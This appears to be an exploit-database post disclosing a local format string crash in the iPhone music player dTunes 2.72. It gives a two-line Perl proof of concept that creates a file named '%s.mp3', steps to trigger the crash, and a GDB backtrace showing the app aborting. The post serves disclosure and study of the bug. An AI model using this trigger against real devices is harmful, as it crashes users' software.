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dTunes 2.72 (Filename Processing) Local Format String PoC

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dTunes 2.72 (Filename Processing) Local Format String PoC


# dTunes 2.72 local format string PoC (filename processing)
# TheLeader, GSOG2009 [st0p] hotmail [sp4m] com
# ShoutZ to the wonderful ppl over at forums.hacking.org.il =]

# Copy the file over to your device on /var/mobile/Library/Downloads/ and attempt playing with dTunes.
# This can also be done through dTunes interface - just tap "Edit", double tap any mp3 file, rename to "%s.mp3", tap "Save", confirm & play.

# PoC:
open (FILE, '>%s.mp3');
close (FILE);

# GDB backtrace:
# 0x3146baa4 in mach_msg_trap ()
# (gdb) c
# Continuing.
# Program received signal SIGABRT, Aborted.
# 0x3145dc58 in __kill ()
# (gdb) bt
# #0  0x3145dc58 in __kill ()
# #1  0x3145dc4c in kill ()
# #2  0x3145dc40 in raise ()
# #3  0x3147842a in abort ()
# #4  0x30075b44 in __gnu_cxx::__verbose_terminate_handler ()
# #5  0x300c2100 in _objc_terminate ()
# #6  0x300730d8 in std::terminate ()
# #7  0x300731e0 in __cxa_throw ()
# #8  0x300c1f8c in objc_exception_throw ()
# #9  0x3029a59e in +[NSException raise:format:arguments:] ()
# #10 0x3029a53e in +[NSException raise:format:] ()
# #11 0x30696de4 in -[NSURL initWithString:relativeToURL:] ()
# #12 0x30696cde in +[NSURL URLWithString:relativeToURL:] ()
# #13 0x330c1008 in -[AVPlaybackItem urlFromPath:] ()
# #14 0x330c259c in -[AVPlaybackItem ensureFPItem] ()
# #15 0x330c4304 in -[AVPlaybackQueue queueItemWasAddedNotification:] ()
# #16 0x30672726 in _nsnote_callback ()
# #17 0x302615a8 in _CFXNotificationPostNotification ()
# #18 0x30670e72 in -[NSNotificationCenter postNotificationName:object:userInfo:] ()
# #19 0x330aa750 in -[AVQueue itemWasAdded:atIndex:] ()
# #20 0x330aa89c in -[AVQueue insertItem:atIndex:error:] ()
# #21 0x000037e4 in -[DTunesMusicPlayViewController buildTrack:] ()
# #22 0x0000366a in -[DTunesMusicPlayViewController nextTrack] ()
# #23 0x000032a0 in -[DTunesMusicPlayViewController updateScreenWhilePlaying] ()
# #24 0x306942a6 in __NSFireTimer ()
# #25 0x30269d8e in CFRunLoopRunSpecific ()
# #26 0x30269326 in CFRunLoopRunInMode ()
# #27 0x31567e60 in GSEventRunModal ()
# #28 0x30a4fa74 in -[UIApplication _run] ()
# #29 0x30a591d8 in UIApplicationMain ()
# #30 0x00002096 in main ()
# (gdb) q

#  0day.today [2024-09-28]  #